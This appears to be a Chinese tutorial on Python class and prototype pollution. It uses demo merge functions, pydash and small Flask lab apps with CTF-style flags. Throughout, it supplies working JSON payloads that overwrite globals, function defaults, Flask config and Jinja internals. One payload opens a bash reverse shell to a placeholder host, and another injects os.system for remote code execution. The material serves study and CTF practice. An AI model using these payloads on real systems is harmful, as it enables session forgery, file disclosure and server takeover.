Python Prototype Pollution

Python原型链污染通常是指通过某种方式非法地修改了对象的原型链,导致对象访问到了不应该访问到的属性或方法,或者对象的属性被非法地修改

Python中,这通常意味着通过修改类的__dict__或对象的__class__属性,来实现对类或对象属性的非法修改

基类

1
2
3
4
5
6
7
8
9
string = ""
print(string.__class__) # <class 'str'>
print(string.__class__.__base__) # <class 'object'>

def function():
pass
print(function.__class__) # <class 'function'>
print(function.__class__.__base__) # <class 'object'>

原型链污染

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
class father:
secret = "xxxx"
class son_a(father):
pass
class son_b(father):
pass

# 将源字典 src 中的键值对合并到目标对象 dst 中
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

instance = son_b()
payload = {
"__class__": {
"__base__": {
"secret": "no"
}
}
}

print(son_a.secret) # xxxx
print(instance.secret) # xxxx

merge(payload, instance)
print(son_a.secret) # no
print(instance.secret) # no


# 污染内置属性
# payload = {
# "__class__" : {
# "__base__" : {
# "__str__" : "Polluted"
# }
# }
# }
#
# print(father.__str__) #<slot wrapper '__str__' of 'object' objects>
# merge(payload, instance)
# print(father.__str__) #Polluted

无法污染的Object

1
2
merge(payload, object)
# 报错:TypeError: can't set attributes of built-in/extension type 'object'

全局变量获取

__init__ 初始化类,返回的类型是function

__globals__ 函数名.__globals__,获取function所处空间下可使用的module、方法以及所有变量

1
2
3
4
5
6
7
8
def funcrion():
pass

class a:
def __init__(self):
pass

print(funcrion.__globals__ == globals() == a.__init__.__globals__) # True

__globlasl__来获取全局变量,可以修改无继承的关系类属性甚至全局变量

1
2
3
4
5
6
7
{
"__init__" : {
"__globals__" : {
"secretkey" : 123
}
}
}

已加载模块获取

1
2
3
4
5
6
# pollution.py
improt test.py
...

# test.py
secretkey = 222

sys的模块modules属性以字典的形式包含了程序自开始运行时所有已加载过的模块,可以直接从该属性中获取到目标模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
// 1
{
"__init__" : {
"__globals__" : {
"test" : {
"secretkey" : 123,
}
}
}
}

// 2
{
"__init__" : {
"__globals__" : {
"sys" : {
"modules" : {
"test" : {
"secretkey" : 123,
}
}
}
}
}
}

加载器

Python中加载器loader为实现模块加载而设计的类,其在importlib这个内置模块中具体实现

importlib模块下所有的py文件中均引入了sys模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
print("sys" in dir(__import__("importlib.__init__")))
#True
print("sys" in dir(__import__("importlib._bootstrap")))
#True
print("sys" in dir(__import__("importlib._bootstrap_external")))
#True
print("sys" in dir(__import__("importlib._common")))
#True
print("sys" in dir(__import__("importlib.abc")))
#True
print("sys" in dir(__import__("importlib.machinery")))
#True
print("sys" in dir(__import__("importlib.metadata")))
#True
print("sys" in dir(__import__("importlib.resources")))
#True
print("sys" in dir(__import__("importlib.util")))
#True

只要能够过度获取到一个loader,便能用同样loader.__init__.__globals__['sys']的方式获取sys模块

__spec__内置属性在Python 3.4版本引入,其涉及到关于类加载时的信息,本身就是定义在的Lib/importlib/_bootstrap.py类ModuleSpec,显然因为定义在importlib模块下的py文件,所以可以直接采用

1
<模块名>.__spec__.__init__.__globals__['sys']获取到sys模块

ModuleSpec属性值的设置,还有一种相对较高的payload获取方式,主要是利用ModuleSpec中的loader属性,该属性值是模块加载时所使用的loader

1
<模块名>.__spec__.loader.__init__.__globals__['sys']

函数形参默认值替换

__defaults__

__defaults__是一个元组(tuple),它存储了函数定义中所有形参的默认值

1
2
3
4
5
6
def func(var_1, var_2 =2, var_3 = 3):
pass
def function(var_1, /, var_2 =2, *, var_3 = 3):
pass
print(func.__defaults__) #(2, 3)
print(function.__defaults__) #(2,)

通过属性替换实现函数位置或键值对的默认值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
def evilFunc(arg_1 , shell = False):
if not shell:
print(arg_1)
else:
print(__import__("os").popen(arg_1).read())

class cls:
def __init__(self):
pass

def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

instance = cls()

payload = {
"__init__" : {
"__globals__" : {
"evilFunc" : {
"__defaults__" : (
True ,
)
}
}
}
}

evilFunc("whoami") # whoami
merge(payload, instance)
evilFunc("whoami") # root

__kwdefaults__

__kwdefaults__是一个字典(dictionary),它存储了函数定义中所有关键字参数(即指定了*的参数)的默认值

1
2
3
4
5
6
def func(var_1, var_2 =2, var_3 = 3):
pass
def function(var_1, /, var_2 =2, *, var_3 = 3):
pass
print(func.__kwdefaults__) # None
print(function.__kwdefaults__) # {'var_3': 3}

通过属性替换实现函数位置或键值对的默认值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
def evilFunc(arg_1, *, shell=False):
if not shell:
print(arg_1)
else:
print(__import__("os").popen(arg_1).read())

class cls:
def __init__(self):
pass

def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)


instance = cls()

payload = {
"__init__": {
"__globals__": {
"evilFunc": {
"__kwdefaults__": {
"shell": True
}
}
}
}
}

evilFunc("whoami") # whoami
merge(payload, instance)
evilFunc("whoami") # uname

特定值替换

os.environ

Python 中 os 模块提供的一个接口,用于访问和修改环境变量。环境变量是操作系统定义的一些变量,通常用于存储与系统行为或应用程序配置相关的信息

os.environ.keys()

主目录下所有的 key

windows:

1
2
3
4
5
6
os.environ['HOMEPATH']:当前用户主目录
os.environ['TEMP']:临时目录路径
os.environ["PATHEXT"]:可执行文件
os.environ['SYSTEMROOT']:系统主目录
os.environ['LOGONSERVER']:机器名
os.environ['PROMPT']:设置提示符

linux:

1
2
3
4
5
os.environ['USER']:当前使用用户
os.environ['LC_COLLATE']:路径扩展的结果排序时的字母顺序
os.environ['SHELL']:使用shell的类型
os.environ['LAN']:使用的语言
os.environ['SSH_AUTH_SOCK']:ssh的执行路径
os.environ.get()

os.environ 是一个环境变量的字典,可以通过 get 方法获取键对应的值。如果有这个键,返回对应的值,如果没有,则返回 none

1
2
import os
print(os.environ.get("HOME"))

也可以设置默认值,当键存在时返回对应的值,不存在时,返回默认值

1
print(os.environ.get("HOME", "default")) # 环境变量HOME不存在,返回default
设置系统环境变量
1
2
3
os.environ['环境变量名称']='环境变量值' #其中key和value均为string类型
os.putenv('环境变量名称', '环境变量值')
os.environ.setdefault('环境变量名称', '环境变量值')
更新系统环境变量
1
os.environ['环境变量名称']='新环境变量值'
获取系统环境变量
1
2
3
os.environ['环境变量名称']
os.getenv('环境变量名称')
os.environ.get('环境变量名称', '默认值') # 默认值可给可不给,环境变量不存在返回默认值
删除系统环境变量
1
2
del os.environ['环境变量名称']
del(os.environ['环境变量名称'])
判断系统环境变量是否存在
1
'环境变量值' in os.environ # 存在返回 True,不存在返回 False

example

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import os

def test():
pass

class a:
def __init__(self):
pass

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
print(dst)
setattr(dst, k, v)

instance = a()

payload = {
"__init__" : {
"__globals__" : {
"os":{
"environ":{
"BASH_FUNC_echo%%":"() { /bin/bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'; }"
}

}
}
}
}

merge(payload,instance)

os.system("/bin/bash -c 'echo \"123\"'")

flask相关特定属性

SECRET_KEY

flasksession重要参数,知道该参数可以实现session任意形式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from flask import Flask,request
import json

app = Flask(__name__)

def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "[+]Config:%s"%(app.config['SECRET_KEY'])


app.run(host="0.0.0.0")

图像-20230123143118284

Payload

1
2
3
4
5
6
7
8
9
10
11
{
"__init__" : {
"__globals__" : {
"app" : {
"config" : {
"SECRET_KEY" :"Polluted~"
}
}
}
}
}

图像-20230123143147406

_got_first_request

用于请求网站是否某次请求为Flask启动后请求,是Flask.got_first_request函数的返回值,此外还可能带来不良影响app.before_first_request,依据来源可以知道_got_first_request值为假时调用

example

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from flask import Flask,request
import json

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

flag = "Is flag here?"

@app.before_first_request
def init():
global flag
if hasattr(app, "special") and app.special == "U_Polluted_It":
flag = open("flag", "rt").read()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
global flag
setattr(app, "special", "U_Polluted_It")
return flag

app.run(host="0.0.0.0")

# flag flag{U_Find_Me}

before_first_request成员的init函数只会在第一次调用前被调用,而其中读取flag的逻辑又需要/之后才能调用,这就造成了矛盾,所以需要使用payload在调用/_got_first_request属性假,这样before_first_request再次调用

图片-20230125235435106

payload

1
2
3
4
5
6
7
8
9
{
"__init__" : {
"__globals__" : {
"app":{
"_got_first_request":false
}
}
}
}
_static_url_path

这个属性中存放的是flask中静态目录的值,默认该值为static

访问flask下的资源可以采用如http://domain/static/xxx,这样实际上就相当于访问_static_url_path目录下xxx的文件并将该文件内容

1
2
3
4
5
6
7
#static/index.html

<html>
<h1>hello</h1>
<body>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#app.py
from flask import Flask,request
import json

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "flag in ./flag but heres only static/index.html"


app.run(host="0.0.0.0")

1
2
3
#flag

flag{U_Find_Me}

污染该属性为当前目录,就能访问当前目录下的flag文件了

img

img

payload

1
2
3
4
5
6
7
8
9
{
"__init__" : {
"__globals__" : {
"app":{
"_static_url_path":"./"
}
}
}
}
os.path.pardir

这个os模块下的变量函数flask模板渲染函数render_template的解析,所以也收录在flask部分

1
2
3
4
5
6
7
#templates/index.html

<html>
<h1>hello</h1>
<body>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# app.py

from flask import Flask,request,render_template
import json
import os

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "flag in ./flag but u just can use /file to vist ./templates/file"

@app.route("/<path:path>")
def render_page(path):
if not os.path.exists("templates/" + path):
return "not found", 404
return render_template(path)

app.run(host="0.0.0.0")
1
2
3
#flag

flag{U_Find_Me}

访问http://domain/xxx时使用render_tempaltes渲染templates/xxx文件

image-20240523155836979

os.path.pardir值默认即为..,修改该属性为任意值即可避免报错,实现render_template函数的目录穿越

图像-20230124165503524

图片-20230124165529630

payload

1
2
3
4
5
6
7
8
9
10
11
{
"__init__" : {
"__globals__" : {
"os":{
"path":{
"pardir":"!"
}
}
}
}
}
Jinja全局数据

除了包括函数、变量、过滤器这三者均被自定义的添加到Jinja语法解析时的环境,操作方式与Jinja语法标识符中完全类似

这里以增加变量为例子给出模拟的环境如下:

1
2
3
4
5
6
7
#templates/index.html

<html>
<h1>{{flag if permission else "No way!"}}</h1>
<body>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#app.py

from flask import Flask,request,render_template
import json

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return render_template("index.html", flag = open("flag", "rt").read())

app.run(host="0.0.0.0")

1
2
3
#flag

flag{U_Find_Me}

访问会由于没有设定permission值导致if条件为假返回No way!而不是flag

image-20240523160412977

所以它赋值为任意逻辑非空值让条件为真即可

图片-20230126163147879

模板编译时的参数

flask实际中,例如使用数据库管理系统中的一个步骤render_template,实际上是对其中一部分Jinja语法进行解析AST,而在语法树的根部Lib/site-packages/jinja2/compiler.pyCodeGenerator``visit_Template

图片-20230126200159703

该逻辑会输出向流写入拼接的代码(输出流中代码最终会被编译执行),注意其中该exported_names信号,信号为.runtime模块一段(即Lib/site-packages/jinja2/runtime.py)中导入的信号exportedasync_exported组合后得到,这就意味着我们可以通过污染.runtime模块中这两个变量实现RCE。由于逻辑模块是模板文件解析过程中必经的步骤之一,所以这就意味着只需渲染任何的文件均能通过这两个变量实现RCE

模拟环境如下:

1
2
3
4
5
6
7
#templates/index.html

<html>
<h1>nt here~</h1>
<body>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# app.py

from flask import Flask,request,render_template
import json

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return render_template("index.html")

app.run(host="0.0.0.0")

1
2
3
4
# static/
# 是个空目录,方便直接利用static目录读取flag

# flag flag{U_Find_Me}

进行RCEflag写入static目录中

图片-20230126214719998

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
{
"__init__" : {
"__globals__" : {
"__loader__": {
"__init__": {
"__globals__":{
"sys": {
"modules" : {
"jinja2" : {
"runtime" : {
"exported": [
"*;__import__('os').system('cp ./flag ./static/flag');#"
]
}
}
}
}
}
}
}
}
}
}

需要注意的是,创建payloadAST 时,脚本会受到脚本的影响,这意味着脚本payload在第一次执行时会触发,然后点击static目录下flag阅读

图片-20230126214326335

Pydash

Pydash模块中的set_set_with函数,如上实例中merge函数引用类似的类属性属性逻辑,能够实现污染攻击

1
2
3
4
5
from pydash import set_

data = {'a': {'b': {'c': 3}}}
set_(data, 'a.b.c', 4)
print(data) # 输出 {'a': {'b': {'c': 4}}}

set_

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pydash import set_

class father:
secret = "xxxx"
class son_a(father):
pass
class son_b(father):
pass

instance = son_b()
payload = {
"__class__": {
"__base__": {
"secret": "no"
}
}
}

print(son_a.secret) # xxxx
print(instance.secret) # xxxx

set_(instance, "__class__.__base__.secret", "no")
print(son_a.secret) # no
print(instance.secret) # no

set_with

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pydash import set_with

class father:
secret = "xxxx"
class son_a(father):
pass
class son_b(father):
pass

instance = son_b()
payload = {
"__class__": {
"__base__": {
"secret": "no"
}
}
}

print(son_a.secret) # xxxx
print(instance.secret) # xxxx

set_with(instance, "__class__.__base__.secret", "no")
print(son_a.secret) # no
print(instance.secret) # no

参考链接:https://tttang.com/archive/1876/#toc_jinja_1

⬆︎TOP